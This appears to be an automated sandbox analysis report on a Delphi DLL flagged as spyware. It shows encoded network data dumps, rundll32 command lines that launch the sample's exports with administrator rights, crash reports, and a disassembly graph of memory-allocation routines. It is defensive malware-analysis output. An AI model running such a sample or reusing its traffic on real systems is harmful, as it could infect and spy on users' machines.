                  2024-04-27 01:32:02 UTC4096INData Raw: 59 4e 37 37 48 62 6c 79 4e 6c 65 34 32 34 0d 0a 55 61 31 45 48 74 30 69 66 53 4e 58 48 47 34 73 79 6e 34 36 72 52 35 48 54 68 2b 30 43 44 64 4b 6b 39 6a 72 32 4e 45 74 65 55 31 42 48 38 51 77 58 79 76 64 76 4f 34 2b 38 79 6c 6f 69 46 36 6e 4f 4e 77 47 6f 45 48 32 67 4c 37 35 0d 0a 52 41 31 41 73 66 6b 4b 5a 7a 34 30 33 50 73 4d 64 75 6e 4f 45 57 2b 6b 57 58 46 30 78 48 4d 48 56 33 31 46 65 34 76 74 6d 2f 48 4e 71 6e 51 71 33 74 46 41 47 79 62 56 49 7a 6c 41 4d 62 42 44 48 35 48 6d 76 59 6b 4b 76 48 31 75 0d 0a 36 44 44 34 66 42 77 6d 68 7a 62 65 34 5a 79 71 74 2f 6a 5a 55 6b 44 73 4f 34 45 6e 35 4e 79 4d 75 46 33 72 45 46 52 68 43 4c 59 47 54 61 66 61 46 43 74 52 70 49 48 57 48 73 48 4e 6b 74 72 75 4c 46 53 69 59 4a 78 6b 62 46 44 31 0d 0a 70 66 76 51 69
                  Data Ascii: YN77HblyNle424Ua1EHt0ifSNXHG4syn46rR5HTh+0CDdKk9jr2NEteU1BH8QwXyvdvO4+8yloiF6nONwGoEH2gL75RA1AsfkKZz403PsMdunOEW+kWXF0xHMHV31Fe4vtm/HNqnQq3tFAGybVIzlAMbBDH5HmvYkKvH1u6DD4fBwmhzbe4Zyqt/jZUkDsO4En5NyMuF3rEFRhCLYGTafaFCtRpIHWHsHNktruLFSiYJxkbFD1pfvQi
                  2024-04-27 01:32:02 UTC4096INData Raw: 5a 72 31 74 46 69 50 59 69 55 46 63 38 78 6a 44 50 4a 73 64 41 73 41 45 4b 65 61 76 4a 73 4f 4f 31 79 43 50 79 6f 79 51 67 77 7a 6c 69 58 59 79 2b 4e 6b 4a 0d 0a 47 75 56 52 54 71 51 37 79 6e 65 51 35 6f 75 31 45 58 6a 4c 65 4d 57 4d 49 37 77 35 35 78 38 75 73 64 52 54 33 33 45 32 4c 58 75 78 2b 59 66 52 2b 32 6c 61 4f 38 7a 4e 52 7a 43 61 37 6f 35 6c 73 6b 78 7a 6f 77 68 6c 38 56 6e 6f 0d 0a 79 45 47 7a 6b 6c 66 69 4a 50 48 74 63 35 46 65 34 33 49 47 35 6f 36 41 36 6b 30 75 70 47 51 47 72 7a 62 37 63 6b 6c 63 78 47 65 48 55 5a 59 65 6b 76 6b 39 47 2f 6f 61 6c 38 37 68 32 49 77 69 64 4b 78 67 72 76 4b 64 65 51 58 65 0d 0a 2b 4f 46 62 45 79 37 4a 63 71 57 59 4d 34 7a 4f 4a 58 45 6d 4b 75 6c 6e 75 6c 56 79 6f 75 42 67 57 4c 57 77 54 6e 59 67 50 53 77 57 6c
                  Data Ascii: Zr1tFiPYiUFc8xjDPJsdAsAEKeavJsOO1yCPyoyQgwzliXYy+NkJGuVRTqQ7yneQ5ou1EXjLeMWMI7w55x8usdRT33E2LXux+YfR+2laO8zNRzCa7o5lskxzowhl8VnoyEGzklfiJPHtc5Fe43IG5o6A6k0upGQGrzb7cklcxGeHUZYekvk9G/oal87h2IwidKxgrvKdeQXe+OFbEy7JcqWYM4zOJXEmKulnulVyouBgWLWwTnYgPSwWl
                  2024-04-27 01:32:02 UTC4096INData Raw: 6f 75 4d 67 69 6e 2f 5a 69 56 70 48 0d 0a 30 2f 32 2b 37 5a 6a 74 59 62 2f 4e 6b 52 6e 62 68 33 58 58 50 59 6e 6d 43 30 73 55 55 5a 36 46 56 61 39 75 41 79 30 5a 78 58 53 48 69 4f 51 68 51 33 6d 4b 4d 41 36 79 70 72 41 6c 36 70 56 62 68 6f 52 36 42 34 68 41 55 36 37 46 0d 0a 33 6b 71 52 6c 6f 78 43 71 68 50 42 65 61 4b 68 50 62 36 4a 4b 47 76 6c 43 4a 33 42 64 6c 6e 54 53 68 59 79 4c 33 64 49 75 59 59 68 43 4d 32 56 6c 72 6c 75 6e 65 52 66 79 38 75 76 36 5a 44 46 6d 6e 42 56 59 4f 37 46 47 6f 50 41 0d 0a 56 6b 65 6c 72 36 78 66 42 6b 57 5a 58 4b 4a 54 64 2f 74 32 54 43 6d 52 32 61 7a 4b 6a 6d 33 6b 67 58 46 78 63 68 30 79 71 59 35 4a 77 46 74 76 56 58 54 31 79 71 4c 4c 68 62 53 32 47 42 5a 6c 52 31 43 59 55 4e 69 30 33 75 6f 6e 0d 0a 75 65 47 70 4b 38 52
                  Data Ascii: ouMgin/ZiVpH0/2+7ZjtYb/NkRnbh3XXPYnmC0sUUZ6FVa9uAy0ZxXSHiOQhQ3mKMA6yprAl6pVbhoR6B4hAU67F3kqRloxCqhPBeaKhPb6JKGvlCJ3BdlnTShYyL3dIuYYhCM2VlrluneRfy8uv6ZDFmnBVYO7FGoPAVkelr6xfBkWZXKJTd/t2TCmR2azKjm3kgXFxch0yqY5JwFtvVXT1yqLLhbS2GBZlR1CYUNi03uonueGpK8R
                  2024-04-27 01:32:02 UTC4096INData Raw: 42 34 55 38 33 31 66 2f 42 34 43 61 73 62 6a 70 72 71 67 4a 2f 31 36 48 62 63 7a 58 56 6f 66 66 4e 6a 34 55 39 61 71 62 6a 72 6b 6b 78 64 45 41 78 56 0d 0a 74 6b 70 43 41 68 4f 39 4c 42 46 52 2b 71 36 76 4d 41 41 2b 66 57 6f 6d 73 49 69 4b 73 32 68 6c 79 4e 6c 6c 6d 65 32 4c 47 45 43 72 69 34 44 45 35 77 76 45 6e 4a 32 76 78 41 49 44 52 71 64 6e 43 52 44 67 45 6a 59 34 36 70 63 73 0d 0a 31 72 52 64 74 67 6d 62 6d 42 58 4c 59 47 37 7a 6e 56 42 31 52 38 79 34 32 73 48 39 46 33 4b 72 59 54 72 53 33 43 37 66 4c 39 71 42 42 72 77 72 67 50 35 62 69 75 5a 46 52 4f 6e 56 38 45 65 5a 42 45 54 70 44 59 6d 4f 78 52 73 59 0d 0a 45 62 68 49 32 6c 48 6e 30 63 6d 67 51 46 47 36 69 69 52 31 79 32 47 41 37 77 62 75 46 55 4c 72 39 30 4b 57 32 41 70 5a 6b 72 74 66 55 63 32
                  Data Ascii: B4U831f/B4CasbjprqgJ/16HbczXVoffNj4U9aqbjrkkxdEAxVtkpCAhO9LBFR+q6vMAA+fWomsIiKs2hlyNllme2LGECri4DE5wvEnJ2vxAIDRqdnCRDgEjY46pcs1rRdtgmbmBXLYG7znVB1R8y42sH9F3KrYTrS3C7fL9qBBrwrgP5biuZFROnV8EeZBETpDYmOxRsYEbhI2lHn0cmgQFG6iiR1y2GA7wbuFULr90KW2ApZkrtfUc2
                  2024-04-27 01:32:02 UTC4096INData Raw: 6e 59 79 77 2b 6c 36 66 78 33 0d 0a 73 63 6c 74 54 41 65 5a 6e 45 66 39 32 4f 56 37 6b 58 36 49 68 68 2b 72 36 59 51 44 42 4f 66 68 35 78 6f 36 77 66 69 79 76 4e 4b 47 68 57 74 32 78 55 6d 31 71 67 31 76 57 54 30 74 42 4d 64 59 69 73 4e 2f 45 75 61 61 36 49 41 6a 0d 0a 36 2f 4e 78 6f 52 78 48 73 43 79 57 6b 70 58 43 2b 65 34 42 73 6d 5a 2f 32 4f 4a 6c 76 4d 4a 63 4f 64 78 5a 61 5a 57 34 74 74 61 4b 68 73 70 45 63 4f 76 77 47 2f 46 51 66 2f 56 6d 73 59 62 47 61 48 6c 45 61 77 42 54 4f 51 7a 64 0d 0a 53 51 4d 4e 30 43 4f 63 62 45 6d 4a 6e 63 7a 44 41 63 64 6a 36 42 5a 43 70 52 78 56 6e 59 2f 6b 39 47 7a 53 61 77 4a 54 32 56 74 52 65 79 35 4b 43 34 59 72 48 79 66 55 4f 73 55 51 64 39 37 65 42 45 6d 67 61 49 30 32 47 6f 51 46 0d 0a 30 4f 6b 57 5a 77 75 47 32
                  Data Ascii: nYyw+l6fx3scltTAeZnEf92OV7kX6Ihh+r6YQDBOfh5xo6wfiyvNKGhWt2xUm1qg1vWT0tBMdYisN/Euaa6IAj6/NxoRxHsCyWkpXC+e4BsmZ/2OJlvMJcOdxZaZW4ttaKhspEcOvwG/FQf/VmsYbGaHlEawBTOQzdSQMN0COcbEmJnczDAcdj6BZCpRxVnY/k9GzSawJT2VtRey5KC4YrHyfUOsUQd97eBEmgaI02GoQF0OkWZwuG2
                  2024-04-27 01:32:02 UTC4096INData Raw: 44 50 77 62 55 61 6d 48 72 73 42 34 45 50 46 6a 76 2b 6f 77 69 2f 61 30 31 34 32 4f 74 33 4a 36 6a 74 49 43 69 6d 4d 43 79 33 72 49 78 44 31 51 0d 0a 78 34 53 58 6a 50 2b 48 59 34 54 7a 43 6c 46 30 6f 67 78 37 57 44 65 46 38 41 79 48 46 4b 76 52 31 73 74 47 63 56 42 77 72 44 62 37 72 5a 6c 37 6c 36 70 62 50 4a 62 79 46 6f 38 46 44 50 4c 61 38 66 71 4c 55 36 41 70 61 2b 56 70 0d 0a 56 48 57 65 36 77 58 69 71 6a 4b 50 70 6d 45 48 61 36 4a 7a 2b 4b 49 79 51 49 77 42 32 4d 43 55 41 79 62 31 31 5a 5a 37 52 66 32 6c 76 58 6a 4e 68 51 37 4e 67 4f 61 67 33 73 45 4b 69 63 2f 48 71 32 63 39 39 69 71 4c 64 53 6d 67 0d 0a 78 34 6c 42 68 4b 30 77 45 4d 4b 43 46 32 53 63 70 74 51 37 78 34 4e 57 79 51 58 30 6a 42 38 30 36 4b 6b 44 62 62 65 70 76 32 4d 2f 59 72 6c 70 66
                  Data Ascii: DPwbUamHrsB4EPFjv+owi/a0142Ot3J6jtICimMCy3rIxD1Qx4SXjP+HY4TzClF0ogx7WDeF8AyHFKvR1stGcVBwrDb7rZl7l6pbPJbyFo8FDPLa8fqLU6Apa+VpVHWe6wXiqjKPpmEHa6Jz+KIyQIwB2MCUAyb11ZZ7Rf2lvXjNhQ7NgOag3sEKic/Hq2c99iqLdSmgx4lBhK0wEMKCF2ScptQ7x4NWyQX0jB806KkDbbepv2M/Yrlpf


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll"
                  Imagebase:0x3c0000
                  File size:126'464 bytes
                  MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1
                  Imagebase:0x240000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,A
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:03:31:56
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 672
                  Imagebase:0xb0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:03:31:59
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:03:32:02
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,B
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",A
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:12
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",B
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:13
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",dbkFCallWrapperAddr
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",__dbk_fcall_wrapper
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  General

                  Target ID:15
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",TMethodImplementationIntercept
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  General

                  Target ID:16
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",F
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  General

                  Target ID:17
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",E
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  General

                  Target ID:18
                  Start time:03:32:05
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",C
                  Imagebase:0x5b0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Has exited:true

                  General

                  Target ID:21
                  Start time:03:32:06
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 652
                  Imagebase:0xb0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:22
                  Start time:03:32:06
                  Start date:27/04/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 656
                  Imagebase:0xb0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:5.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:109
                    Total number of Limit Nodes:3
                    execution_graph 409 6c7c6180 410 6c7c6218 409->410 411 6c7c6190 409->411 414 6c7c5ab8 410->414 415 6c7c6221 410->415 412 6c7c619d 411->412 413 6c7c61d4 411->413 417 6c7c61a8 412->417 423 6c7c5c04 10 API calls 412->423 416 6c7c5c04 10 API calls 413->416 418 6c7c6493 414->418 421 6c7c5adc VirtualQuery 414->421 422 6c7c5bbb 414->422 419 6c7c6239 415->419 437 6c7c6348 415->437 420 6c7c61eb 416->420 425 6c7c625c 419->425 430 6c7c6320 419->430 460 6c7c6240 419->460 427 6c7c6213 420->427 432 6c7c61f7 420->432 438 6c7c5b15 421->438 439 6c7c5b83 421->439 428 6c7c5bc1 422->428 434 6c7c5c04 10 API calls 422->434 429 6c7c61b5 423->429 424 6c7c63ac 426 6c7c5c04 10 API calls 424->426 451 6c7c63c5 424->451 443 6c7c629c Sleep 425->443 425->460 431 6c7c645c 426->431 435 6c7c61cf 429->435 436 6c7c61b9 429->436 440 6c7c5c04 10 API calls 430->440 446 6c7c6469 431->446 431->451 456 6c7c5f88 10 API calls 432->456 441 6c7c5bd2 434->441 452 6c7c5f88 10 API calls 436->452 437->424 442 6c7c6384 Sleep 437->442 437->451 438->439 449 6c7c5b40 438->449 450 6c7c5b42 VirtualAlloc 438->450 470 6c7c5c04 439->470 445 6c7c6329 440->445 441->428 457 6c7c5be0 441->457 442->424 447 6c7c639e Sleep 442->447 448 6c7c62b4 Sleep 443->448 443->460 454 6c7c632d 445->454 455 6c7c6343 445->455 463 6c7c5f88 10 API calls 446->463 447->437 448->425 449->450 450->439 458 6c7c5b58 VirtualAlloc 450->458 459 6c7c61cd 452->459 453 6c7c5b8a 453->428 467 6c7c5b98 453->467 465 6c7c5f88 10 API calls 454->465 461 6c7c6211 456->461 464 6c7c5f88 10 API calls 457->464 458->439 462 6c7c5b6e 458->462 459->435 461->427 462->428 466 6c7c6480 463->466 464->428 468 6c7c6341 465->468 494 6c7c5f88 467->494 468->455 471 6c7c5c1c 470->471 472 6c7c5e64 470->472 482 6c7c5c2e 471->482 484 6c7c5cb9 Sleep 471->484 473 6c7c5f7c 472->473 474 6c7c5e28 472->474 475 6c7c5f85 473->475 476 6c7c59b0 VirtualAlloc 473->476 483 6c7c5e42 Sleep 474->483 485 6c7c5e82 474->485 475->453 478 6c7c59eb 476->478 479 6c7c59db 476->479 477 6c7c5c3d 477->453 478->453 514 6c7c5964 479->514 481 6c7c5d1c 493 6c7c5d28 481->493 519 6c7c58e8 481->519 482->477 482->481 488 6c7c5cfd Sleep 482->488 483->485 486 6c7c5e58 Sleep 483->486 484->482 487 6c7c5ccf Sleep 484->487 489 6c7c58e8 VirtualAlloc 485->489 490 6c7c5ea0 485->490 486->474 487->471 488->481 492 6c7c5d13 Sleep 488->492 489->490 490->453 492->482 493->453 495 6c7c5f9d 494->495 496 6c7c6080 494->496 498 6c7c5fa3 495->498 502 6c7c601a Sleep 495->502 497 6c7c5a14 496->497 496->498 499 6c7c617a 497->499 500 6c7c5964 2 API calls 497->500 501 6c7c5fac 498->501 504 6c7c605e Sleep 498->504 509 6c7c6095 498->509 499->462 505 6c7c5a25 500->505 501->462 502->498 503 6c7c6034 Sleep 502->503 503->495 506 6c7c6074 Sleep 504->506 504->509 507 6c7c5a3b VirtualFree 505->507 508 6c7c5a55 505->508 506->498 510 6c7c5a4c 507->510 508->510 511 6c7c5a5e VirtualQuery VirtualFree 508->511 512 6c7c6114 VirtualFree 509->512 513 6c7c60b8 509->513 510->462 511->508 511->510 512->462 513->462 515 6c7c59ac 514->515 516 6c7c596d 514->516 515->478 516->515 517 6c7c5978 Sleep 516->517 517->515 518 6c7c5992 Sleep 517->518 518->516 520 6c7c587c 519->520 521 6c7c58f1 VirtualAlloc 520->521 522 6c7c5908 521->522 522->493

                    Callgraph

                    Executed Functions

                    Function 6C7C58E8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,6C7C5EFF), ref: 6C7C58FF
                    Memory Dump Source
                    • Source File: 00000004.00000002.1856298237.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000004.00000002.1856271539.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1856298237.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857188513.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857231222.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857274816.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857315399.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857371646.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857414819.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857475324.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857545970.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857600499.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857657485.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1857700755.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction ID: 4794626067cc3563887c76531e53d3a075ca025a932c8d9a31275ab1644736e6
                    • Opcode Fuzzy Hash: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction Fuzzy Hash: 58F0AFF6B013025FFB548F789A857827BE9A709354F51427EEA09DBBC4E7B088008780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 6C7C5F88 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 6c7c5f88-6c7c5f97 6 6c7c5f9d-6c7c5fa1 5->6 7 6c7c6080-6c7c6083 5->7 8 6c7c6004-6c7c600d 6->8 9 6c7c5fa3-6c7c5faa 6->9 10 6c7c6089-6c7c6093 7->10 11 6c7c6170-6c7c6174 7->11 8->9 18 6c7c600f-6c7c6018 8->18 12 6c7c5fac-6c7c5fb7 9->12 13 6c7c5fd8-6c7c5fda 9->13 14 6c7c6044-6c7c6051 10->14 15 6c7c6095-6c7c60a1 10->15 16 6c7c617a-6c7c617f 11->16 17 6c7c5a14-6c7c5a39 call 6c7c5964 11->17 21 6c7c5fb9-6c7c5fbe 12->21 22 6c7c5fc0-6c7c5fd5 12->22 25 6c7c5fdc-6c7c5fed 13->25 26 6c7c5fef 13->26 14->15 19 6c7c6053-6c7c605c 14->19 23 6c7c60d8-6c7c60e6 15->23 24 6c7c60a3-6c7c60a6 15->24 36 6c7c5a3b-6c7c5a4a VirtualFree 17->36 37 6c7c5a55-6c7c5a5c 17->37 18->8 27 6c7c601a-6c7c602e Sleep 18->27 19->14 29 6c7c605e-6c7c6072 Sleep 19->29 31 6c7c60aa-6c7c60ae 23->31 33 6c7c60e8-6c7c60ed call 6c7c57dc 23->33 24->31 25->26 32 6c7c5ff2-6c7c5fff 25->32 26->32 27->9 28 6c7c6034-6c7c603f Sleep 27->28 28->8 29->15 35 6c7c6074-6c7c607b Sleep 29->35 38 6c7c60f0-6c7c60fd 31->38 39 6c7c60b0-6c7c60b6 31->39 32->10 33->31 35->14 42 6c7c5a4c-6c7c5a4e 36->42 43 6c7c5a50-6c7c5a53 36->43 46 6c7c5a5e-6c7c5a7a VirtualQuery VirtualFree 37->46 38->39 41 6c7c60ff-6c7c6106 call 6c7c57dc 38->41 44 6c7c6108-6c7c6112 39->44 45 6c7c60b8-6c7c60d6 call 6c7c581c 39->45 41->39 50 6c7c5a8f-6c7c5a91 42->50 43->50 48 6c7c6114-6c7c613c VirtualFree 44->48 49 6c7c6140-6c7c616d call 6c7c587c 44->49 52 6c7c5a7c-6c7c5a7f 46->52 53 6c7c5a81-6c7c5a87 46->53 54 6c7c5aa6-6c7c5ab6 50->54 55 6c7c5a93-6c7c5aa3 50->55 52->50 53->50 59 6c7c5a89-6c7c5a8d 53->59 55->54 59->46
                    APIs
                    • Sleep.KERNEL32(00000000,?), ref: 6C7C601E
                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 6C7C6038
                    Memory Dump Source
                    • Source File: 00000004.00000002.1856298237.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000004.00000002.1856271539.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000004.00000002.1856298237.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
